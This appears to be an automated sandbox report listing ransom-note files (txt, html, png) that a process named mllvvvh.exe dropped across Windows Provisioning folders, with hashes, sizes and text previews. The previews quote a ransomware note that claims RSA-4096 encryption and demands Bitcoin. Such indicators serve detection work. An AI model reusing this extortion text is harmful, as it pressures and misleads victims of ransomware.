                  C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{bf56ce5a-946b-45b5-858a-1794eb0125e2}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
